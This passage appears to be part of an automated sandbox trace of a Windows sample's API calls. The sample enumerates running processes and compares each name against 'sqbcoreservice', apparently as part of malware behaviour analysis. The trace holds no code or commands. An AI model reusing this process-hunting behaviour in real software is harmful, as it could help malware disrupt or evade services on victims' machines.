th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0096.168] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="spoolsv.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0096.168] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x35769e8 [0096.168] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="spoolsv.exe", cchWideChar=-1, lpMultiByteStr=0x35769e8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spoolsv.exe", lpUsedDefaultChar=0x0) returned 12 [0096.168] lstrcpyA (in: lpString1=0x567fabc, lpString2="spoolsv.exe" | out: lpString1="spoolsv.exe") returned="spoolsv.exe" [0096.168] StrStrIA (lpFirst="spoolsv.exe", lpSrch="sqbcoreservice") returned 0x0 [0096.168] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x69c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0096.169] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0096.169] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3576ac0 [0096.170] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x3576ac0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0096.170] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0096.170] StrStrIA (lpFirst="svchost.exe", lpSrch="sqbcoreservice") returned 0x0 [0096.170] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x554, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0096.171] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="audiodg.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0096.171] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3576a00 [0096.171] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="audiodg.exe", cchWideChar=-1, lpMultiByteStr=0x3576a00, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="audiodg.exe", lpUsedDefaultChar=0x0) returned 12 [0096.171] lstrcpyA (in: lpString1=0x567fabc, lpString2="audiodg.exe" | out: lpString1="audiodg.exe") returned="audiodg.exe" [0096.171] StrStrIA (lpFirst="audiodg.exe", lpSrch="sqbcoreservice") returned 0x0 [0096.171] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x708, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x3ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0096.172] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="sihost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0096.172] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x3576af0 [0096.172] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="sihost.exe", cchWideChar=-1, lpMultiByteStr=0x3576af0, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sihost.exe", lpUsedDefaultChar=0x0) returned 11 [0096.172] lstrcpyA (in: lpString1=0x567fabc, lpString2="sihost.exe" | out: lpString1="sihost.exe") returned="sihost.exe" [0096.172] StrStrIA (lpFirst="sihost.exe", lpSrch="sqbcoreservice") returned 0x0 [0096.172] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x720, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0096.174] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0096.174] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3576b08 [0096.174] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x3576b08, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0096.174] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0096.174] StrStrIA (lpFirst="svchost.exe", lpSrch="sqbcoreservice") returned 0x0 [0096.174] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x3ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0096.175] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="taskhostw.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0096.175] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0x3576b20 [0096.175] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="taskhostw.exe", cchWideChar=-1, lpMultiByteStr=0x3576b20, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="taskhostw.exe", lpUsedDefaultChar=0x0) returned 14 [0096.175] lstrcpyA (in: lpString1=0x567fabc, lpString2="taskhostw.exe" | out: lpString1="taskhostw.exe") returned="taskhostw.exe" [0096.175] StrStrIA (lpFirst="taskhostw.exe", lpSrch="sqbcoreservice") returned 0x0 [0096.176] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x560, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3d, th32ParentProcessID=0x568, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0096.177] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="explorer.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0096.177] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x3576b38 [0096.177] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="explorer.exe", cchWideChar=-1, lpMultiByteStr=0x3576b38, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="explorer.exe", lpUsedDefaultChar=0x0) returned 13 [0096.177] lstrcpyA (in: lpString1=0x567fabc, lpString2="explorer.exe" | out: lpString1="explorer.exe") returned="explorer.exe" [0096.177] StrStrIA (lpFirst="explorer.exe", lpSrch="sqbcoreservice") returned 0x0 [0096.177] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x818, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0096.178] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="OfficeClickToRun.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0096.178] LocalAlloc (uFlags=0x40, uBytes=0x15) returned 0x3575d00 [0096.178] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="OfficeClickToRun.exe", cchWideChar=-1, lpMultiByteStr=0x3575d00, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OfficeClickToRun.exe", lpUsedDefaultChar=0x0) returned 21 [0096.178] lstrcpyA (in: lpString1=0x567fabc, lpString2="OfficeClickToRun.exe" | out: lpString1="OfficeClickToRun.exe") returned="OfficeClickToRun.exe" [0096.178] StrStrIA (lpFirst="OfficeClickToRun.exe", lpSrch="sqbcoreservice") returned 0x0 [0096.178] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x84c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="SecurityHealthService.exe")) returned 1 [0096.179] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="SecurityHealthService.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 26 [0096.179] LocalAlloc (uFlags=0x40, uBytes=0x1a) returned 0x356b118 [0096.180] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="SecurityHealthService.exe", cchWideChar=-1, lpMultiByteStr=0x356b118, cbMultiByte=26, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SecurityHealthService.exe", lpUsedDefaultChar=0x0) returned 26 [0096.180] lstrcpyA (in: lpString1=0x567fabc, lpString2="SecurityHealthService.exe" | out: lpString1="SecurityHealthService.exe") returned="SecurityHealthService.exe" [0096.180] StrStrIA (lpFirst="SecurityHealthService.exe", lpSrch="sqbcoreservice") returned 0x0 [0096.180] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x4, pcPriClassBase=8, dwFlags=0x0, szExeFile="Memory Compression")) returned 1 [0096.181] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="Memory Compression", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0096.181] LocalAlloc (uFlags=0x40, uBytes=0x13) returned 0x3575fe0 [0096.181] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="Memory Compression", cchWideChar=-1, lpMultiByteStr=0x3575fe0, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Memory Compression", lpUsedDefaultChar=0x0) returned 19 [0096.181] lstrcpyA (in: lpString1=0x567fabc, lpString2="Memory Compression" | out: lpString1="Memory Compression") returned="Memory Compression" [0096.181] StrStrIA (lpFirst="Memory Compression", lpSrch="sqbcoreservice") returned 0x0 [0096.181] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb3c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0096.182] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="ShellExperienceHost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0096.182] LocalAlloc (uFlags=0x40, uBytes=0x18) returned 0x3575da0 [0096.182] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="ShellExperienceHost.exe", cchWideChar=-1, lpMultiByteStr=0x3575da0, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ShellExperienceHost.exe", lpUsedDefaultChar=0x0) returned 24 [0096.182] lstrcpyA (in: lpString1=0x567fabc, lpString2="ShellExperienceHost.exe" | out: lpString1="ShellExperienceHost.exe") returned="ShellExperienceHost.exe" [0096.182] StrStrIA (lpFirst="ShellExperienceHost.exe", lpSrch="sqbcoreservice") returned 0x0 [0096.182] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0096.183] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="SearchUI.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0096.183] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x3576bc8 [0096.183] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="SearchUI.exe", cchWideChar=-1, lpMultiByteStr=0x3576bc8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SearchUI.exe", lpUsedDefaultChar=0x0) returned 13 [0096.183] lstrcpyA (in: lpString1=0x567fabc, lpString2="SearchUI.exe" | out: lpString1="SearchUI.exe") returned="SearchUI.exe" [0096.183] StrStrIA (lpFirst="SearchUI.exe", lpSrch="sqbcoreservice") returned 0x0 [0096.183] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbe4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0096.184] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="RuntimeBroker.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0096.184] LocalAlloc (uFlags=0x40, uBytes=0x12) returned 0x3575f80 [0096.184] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="RuntimeBroker.exe", cchWideChar=-1, lpMultiByteStr=0x3575f80, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RuntimeBroker.exe", lpUsedDefaultChar=0x0) returned 18 [0096.184] lstrcpyA (in: lpString1=0x567fabc, lpString2="RuntimeBroker.exe" | out: lpString1="RuntimeBroker.exe") returned="RuntimeBroker.exe" [0096.184] StrStrIA (lpFirst="RuntimeBroker.exe", lpSrch="sqbcoreservice") returned 0x0 [0096.184] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0096.185] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="WmiPrvSE.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0096.186] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x3576b50 [0096.186] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="WmiPrvSE.exe", cchWideChar=-1, lpMultiByteStr=0x3576b50, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WmiPrvSE.exe", lpUsedDefaultChar=0x0) returned 13 [0096.186] lstrcpyA (in: lpString1=0x567fabc, lpString2="WmiPrvSE.exe" | out: lpString1="WmiPrvSE.exe") returned="WmiPrvSE.exe" [0096.186] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="sqbcoreservice") returned 0x0 [0096.186] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x38c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="pending.exe")) returned 1 [0096.187] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="pending.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0096.187] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3576b68 [0096.187] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="pending.exe", cchWideChar=-1, lpMultiByteStr=0x3576b68, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="pending.exe", lpUsedDefaultChar=0x0) returned 12 [0096.187] lstrcpyA (in: lpString1=0x567fabc, lpString2="pending.exe" | out: lpString1="pending.exe") returned="pending.exe" [0096.187] StrStrIA (lpFirst="pending.exe", lpSrch="sqbcoreservice") returned 0x0 [0096.187] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="appointmentimpressed.exe")) returned 1 [0096.188] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="appointmentimpressed.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 25 [0096.188] LocalAlloc (uFlags=0x40, uBytes=0x19) returned 0x356b2f8 [0096.188] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="appointmentimpressed.exe", cchWideChar=-1, lpMultiByteStr=0x356b2f8, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="appointmentimpressed.exe", lpUsedDefaultChar=0x0) returned 25 [0096.188] lstrcpyA (in: lpString1=0x567fabc, lpString2="appointmentimpressed.exe" | out: lpString1="appointmentimpressed.exe") returned="appointmentimpressed.exe" [0096.188] StrStrIA (lpFirst="appointmentimpressed.exe", lpSrch="sqbcoreservice") returned 0x0 [0096.188] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="swing prefer.exe")) returned 1 [0096.189] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="swing prefer.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0096.189] LocalAlloc (uFlags=0x40, uBytes=0x11) returned 0x3575ea0 [0096.189] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="swing prefer.exe", cchWideChar=-1, lpMultiByteStr=0x3575ea0, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="swing prefer.exe", lpUsedDefaultChar=0x0) returned 17 [0096.189] lstrcpyA (in: lpString1=0x567fabc, lpString2="swing prefer.exe" | out: lpString1="swing prefer.exe") returned="swing prefer.exe" [0096.189] StrStrIA (lpFirst="swing prefer.exe", lpSrch="sqbcoreservice") returned 0x0 [0096.189] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x384, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="vietnamese_mature_hat.exe")) returned 1 [0096.192] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="vietnamese_mature_hat.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 26 [0096.193] LocalAlloc (uFlags=0x40, uBytes=0x1a) returned 0x356b028 [0096.193] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="vietnamese_mature_hat.exe", cchWideChar=-1, lpMultiByteStr=0x356b028, cbMultiByte=26, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="vietnamese_mature_hat.exe", lpUsedDefaultChar=0x0) returned 26 [0096.193] lstrcpyA (in: lpString1=0x567fabc, lpString2="vietnamese_mature_hat.exe" | out: lpString1="vietnamese_mature_hat.exe") returned="vietnamese_mature_hat.exe" [0096.193] StrStrIA (lpFirst="vietnamese_mature_hat.exe", lpSrch="sqbcoreservice") returned 0x0 [0096.193] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="nights-attending.exe")) returned 1 [0096.194] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="nights-attending.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0096.194] LocalAlloc (uFlags=0x40, uBytes=0x15) returned 0x3575ee0 [0096.194] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="nights-attending.exe", cchWideChar=-1, lpMultiByteStr=0x3575ee0, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="nights-attending.exe", lpUsedDefaultChar=0x0) returned 21 [0096.194] lstrcpyA (in: lpString1=0x567fabc, lpString2="nights-attending.exe" | out: lpString1="nights-attending.exe") returned="nights-attending.exe" [0096.194] StrStrIA (lpFirst="nights-attending.exe", lpSrch="sqbcoreservice") returned 0x0 [0096.194] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x51c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="installed.exe")) returned 1 [0096.195] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="installed.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0096.195] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0x3576d78 [0096.195] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="installed.exe", cchWideChar=-1, lpMultiByteStr=0x3576d78, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="installed.exe", lpUsedDefaultChar=0x0) returned 14 [0096.195] lstrcpyA (in: lpString1=0x567fabc, lpString2="installed.exe" | out: lpString1="installed.exe") returned="installed.exe" [0096.195] StrStrIA (lpFirst="installed.exe", lpSrch="sqbcoreservice") returned 0x0 [0096.195] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x794, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="references compounds.exe")) returned 1 [0096.196] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="references compounds.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 25 [0096.196] LocalAlloc (uFlags=0x40, uBytes=0x19) returned 0x356af38 [0096.196] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="references compounds.exe", cchWideChar=-1, lpMultiByteStr=0x356af38, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="references compounds.exe", lpUsedDefaultChar=0x0) returned 25 [0096.196] lstrcpyA (in: lpString1=0x567fabc, lpString2="references compounds.exe" | out: lpString1="references compounds.exe") returned="references compounds.exe" [0096.196] StrStrIA (lpFirst="references compounds.exe", lpSrch="sqbcoreservice") returned 0x0 [0096.196] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="albuquerque_left.exe")) returned 1 [0096.197] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="albuquerque_left.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0096.197] LocalAlloc (uFlags=0x40, uBytes=0x15) returned 0x3575f20 [0096.197] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="albuquerque_left.exe", cchWideChar=-1, lpMultiByteStr=0x3575f20, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="albuquerque_left.exe", lpUsedDefaultChar=0x0) returned 21 [0096.197] lstrcpyA (in: lpString1=0x567fabc, lpString2="albuquerque_left.exe" | out: lpString1="albuquerque_left.exe") returned="albuquerque_left.exe" [0096.198] StrStrIA (lpFirst="albuquerque_left.exe", lpSrch="sqbcoreservice") returned 0x0 [0096.198] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd18, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="registered try.exe")) returned 1 [0096.210] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="registered try.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0096.210] LocalAlloc (uFlags=0x40, uBytes=0x13) returned 0x3575f00 [0096.210] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="registered try.exe", 